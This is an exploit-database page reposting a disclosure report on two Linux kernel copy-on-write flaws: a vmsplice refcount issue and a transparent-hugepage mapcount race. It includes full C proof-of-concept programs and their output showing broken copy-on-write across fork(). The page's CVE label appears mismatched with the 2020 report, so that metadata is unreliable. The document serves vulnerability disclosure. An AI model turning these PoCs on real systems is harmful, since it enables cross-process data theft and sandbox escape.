Exploitalert - Database of Exploits

Linux CoW Incorrect Access Grant

CVE	Category	Price	Severity
CVE-2016-5195	CWE-264	$1000	Critical

Author	Risk	Exploitation Type	Date
Unknown	Critical	Local	2020-08-25

CPE
cpe:cpe:/o:linux:linux_kernel

CVSS	EPSS	EPSSP
CVSS:4.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	High	AC	The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2020080129

Linux CoW Incorrect Access Grant

Linux: CoW can wrongly grant write access (because of pinned references or THP bug) I've stumbled over two ways in which copy-on-write of anonymous memory after fork() is currently broken: Page references through the page refcount and a bug in THP logic. == Page refcount isn't being accounted for == This one's fairly straightforward: ``` $ cat vmsplice.c #define _GNU_SOURCE #include <stdio.h> #include <fcntl.h> #include <string.h> #include <stdlib.h> #include <err.h> #include <unistd.h> #include <sys/uio.h> #include <sys/mman.h> #include <sys/wait.h> #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) static void *data; static void child_fn(void) { int pipe_fds[2]; SYSCHK(pipe(pipe_fds)); struct iovec iov = {.iov_base = data, .iov_len = 0x1000 }; SYSCHK(vmsplice(pipe_fds[1], &iov, 1, 0)); SYSCHK(munmap(data, 0x1000)); sleep(2); char buf[0x1000]; SYSCHK(read(pipe_fds[0], buf, 0x1000)); printf(\"read string from child: %s\ \", buf); } int main(void) { if (posix_memalign(&data, 0x1000, 0x1000)) errx(1, \"posix_memalign()\"); strcpy(data, \"BORING DATA\"); pid_t child = SYSCHK(fork()); if (child == 0) { child_fn(); return 0; } sleep(1); strcpy(data, \"THIS IS SECRET\"); int status; SYSCHK(wait(&status)); } $ gcc -o vmsplice vmsplice.c && ./vmsplice read string from child: THIS IS SECRET $ ``` As you can see, the fork() child can read memory from the parent by grabbing a refcounted reference to a page with vmsplice(), then dropping the page from its pagetables. This is because the CoW fault handler grants the parent write access to the original page if its mapcount indicates that nobody else has it mapped. This could potentially have security implications in environments like Android, where (almost) all apps are forked from a common zygote process. In the following scenario, this would lead to data leakage between apps: - zygote writes to page X (ensuring that any preexisting CoW is broken) - zygote forks off an attacker-controlled child process C1 - C1 grabs page X into a pipe with vmsplice() - C1 drops its mapcount on page X - zygote forks off a victim child process C2 - zygote writes to page X (resolving CoW fault by duplicating the page) - C2 writes secret data to page X (resolving CoW fault by granting write access to the original page) - C1 reads secret data from the pipe However, so far I haven't managed to actually leak data from another app with this one. == THP mapcount check is racy == This one is somewhat more severe. Basically, there is a race between __split_huge_pmd_locked() and page_trans_huge_map_swapcount() that can cause the THP CoW fault path to ignore up to two other mappings if one other process is concurrently shattering its THP mapping. I think this may have been introduced in commit 6d0a07edd17c (\"mm: thp: calculate the mapcount correctly for THP pages during WP faults\"). page_trans_huge_map_swapcount() first looks at 4K mapcounts, then looks at the DoubleMap flag and the compound_mapcount(page). __split_huge_pmd_locked() can concurrently move references from the compound mapcount over to the 4K mapcounts. There are no common locks between the two. Therefore, essentially, page_trans_huge_map_swapcount() can observe the old state of the 4K mapcounts (which don't yet account for the other mapping) combined with the new state of the hugepage mapcount (which doesn't account for the other mapping anymore). It is possible for not just one, but two mappings to be ignored because of the DoubleMap flag: If page_trans_huge_map_swapcount() observes the old state of the 4K mapcounts, but the new state of the DoubleMap flag, it will incorrectly subtract 1 from the result in addition to not observing the mapcount of the __split_huge_pmd_locked() caller. Here is a PoC that demonstrates the issue with two mappings (testing in a KVM guest): ----------------------------------------------------------- user@vm:~/tmp/transhuge$ cat thp_munmap.c #include <sys/mman.h> #include <err.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/wait.h> #include <sys/eventfd.h> int main(void) { volatile char *mapping = mmap((void*)0x200000, 0x200000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); if (mapping == MAP_FAILED) err(1, \"mmap\"); *mapping = 1; system(\"cat /proc/$PPID/smaps | head -n40; echo =======================\"); int efd = eventfd(0, 0); unsigned long long iteration = 0; while (1) { iteration++; *mapping = 1; pid_t child = fork(); if (child == -1) err(1, \"fork\"); if (child == 0) { if (munmap((void*)(mapping+0x1000), 0x1f0000)) err(1, \"munmap\"); // wait for parent to tell us to measure and exit uint64_t dummy; if (eventfd_read(efd, &dummy)) err(1, \"eventfd_read\"); if (*mapping != 1) errx(1, \"broken cow: expected 1, got %hhd, in iteration %llu\", *mapping, iteration); //system(\"cat /proc/$PPID/smaps | head -n40; echo =======================\"); exit(0); } *mapping = 2; // tell child to continue if (eventfd_write(efd, 1)) err(1, \"eventfd_write\"); int status; if (waitpid(child, &status, 0) != child) err(1, \"waitpid\"); } } user@vm:~/tmp/transhuge$ gcc -o thp_munmap thp_munmap.c user@vm:~/tmp/transhuge$ ./thp_munmap 00200000-00400000 rw-p 00000000 00:00 0 Size: 2048 kB KernelPageSize: 4 kB MMUPageSize: 4 kB Rss: 2048 kB Pss: 2048 kB Shared_Clean: 0 kB Shared_Dirty: 0 kB Private_Clean: 0 kB Private_Dirty: 2048 kB Referenced: 2048 kB Anonymous: 2048 kB LazyFree: 0 kB AnonHugePages: 2048 kB [...] ======================= thp_munmap: broken cow: expected 1, got 2, in iteration 48580 thp_munmap: broken cow: expected 1, got 2, in iteration 239811 ^C user@vm:~/tmp/transhuge$ ----------------------------------------------------------- By relying on khugepaged, it is even possible to trigger this issue without explicit mm syscalls, just malloc(), fork() and free(), as long as the kernel is configured to automatically collapse hugepages with khugepaged (which seems to be the case e.g. on Debian): ----------------------------------------------------------- $ cat thp_malloc_large_nosleep.c #include <stdlib.h> #include <string.h> #include <unistd.h> #include <stdio.h> #include <stdint.h> #include <err.h> #include <sys/eventfd.h> #include <sys/poll.h> #include <sys/wait.h> int main(void) { int efd = eventfd(0, 0); char *a = malloc(0x1fe000); char *b = malloc(0x1fe000); printf(\"a = %p, b = %p\ \", a, b); printf(\"waiting for keypress...\ \"); // we want khugepaged to create a hugepage that // covers parts of `a` and `b` here while (1) { struct pollfd pollfd = {.fd = 0, .events = POLLIN}; if (poll(&pollfd, 1, 1000) == 1) break; memset(a, 'A', 0x1fe000); memset(b, 'B', 0x1fe000); } unsigned long long iteration = 0; while (1) { iteration++; a[0] = 1; pid_t child = fork(); if (child == -1) err(1, \"fork\"); if (child == 0) { // shatter hugepage free(b); // wait for parent to tell us to measure and exit uint64_t dummy; if (eventfd_read(efd, &dummy)) err(1, \"eventfd_read\"); if (a[0] != 1) printf(\"broken cow: expected 1, got %hhd, in iteration %llu\ \", a[0], iteration); exit(0); } // normally this should copy the hugepage (or fall back to // creating a 4K-page copy), but if we win the race it'll // write directly to the original page a[0] = 2; // tell child to continue if (eventfd_write(efd, 1)) err(1, \"eventfd_write\"); int status; if (waitpid(child, &status, 0) != child) err(1, \"waitpid\"); } } $ gcc -O2 -o thp_malloc_large_nosleep thp_malloc_large_nosleep.c $ ./thp_malloc_large_nosleep a = 0x7f49c2e28010, b = 0x7f49c2c29010 waiting for keypress... [wait until khugepaged has collapsed the page according to smaps, then press enter and wait] broken cow: expected 1, got 2, in iteration 333209 broken cow: expected 1, got 2, in iteration 703886 broken cow: expected 1, got 2, in iteration 850974 broken cow: expected 1, got 2, in iteration 1014706 broken cow: expected 1, got 2, in iteration 1137223 broken cow: expected 1, got 2, in iteration 1143961 broken cow: expected 1, got 2, in iteration 1176183 broken cow: expected 1, got 2, in iteration 1970669 ^C $ ----------------------------------------------------------- The three-process version of this is probably more interesting for local privilege escalation attacks (since you can gain write access to the memory of a process that is not participating in the race at all); however, it also has a much narrower race window: One process needs to go through the critical section of __split_huge_pmd_locked() while another one is stuck in this part of page_trans_huge_map_swapcount(): for (i = 0; i < HPAGE_PMD_NR; i++) { // race region begins with this atomic_read() in the // last iteration mapcount = atomic_read(&page[i]._mapcount) + 1; _total_mapcount += mapcount; if (map) { swapcount = swap_count(map[offset + i]); _total_swapcount += swapcount; } map_swapcount = max(map_swapcount, mapcount + swapcount); } unlock_cluster(ci); // race region ends with the PG_double_map test in here if (PageDoubleMap(page)) { map_swapcount -= 1; _total_mapcount -= HPAGE_PMD_NR; } mapcount = compound_mapcount(page); An attacker can't preempt the task here because it's holding a spinlock; but IRQs are on, so e.g. TLB flush IPIs from another thread can interrupt execution for quite some time. (But I haven't really figured out yet how accurately you could hit this race; according to some early experiments I've done, it looks like if you know the exact configuration of the system, you may be able to cause the TLB flush to happen in the race window with a probability around 0.3% or so, and then you'd need to additionally have __split_huge_pmd_locked() happen at the right time.) If an attacker could write a sufficiently fast attack for this issue, they might be able to use it to break out of e.g. the Chrome renderer sandbox on normal Linux desktop systems - Chrome on Linux creates untrusted renderers as child processes of a \"zygote\" process, which doesn't seem to be fully sandboxed, so an attacker controlling two of its children could potentially use this bug to cause memory corruption in the zygote. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-08-25. Disclosure at an earlier date is possible if the bug has been fixed in Linux stable releases (per agreement with [email protected] folks). Found by: [email protected]

Impressum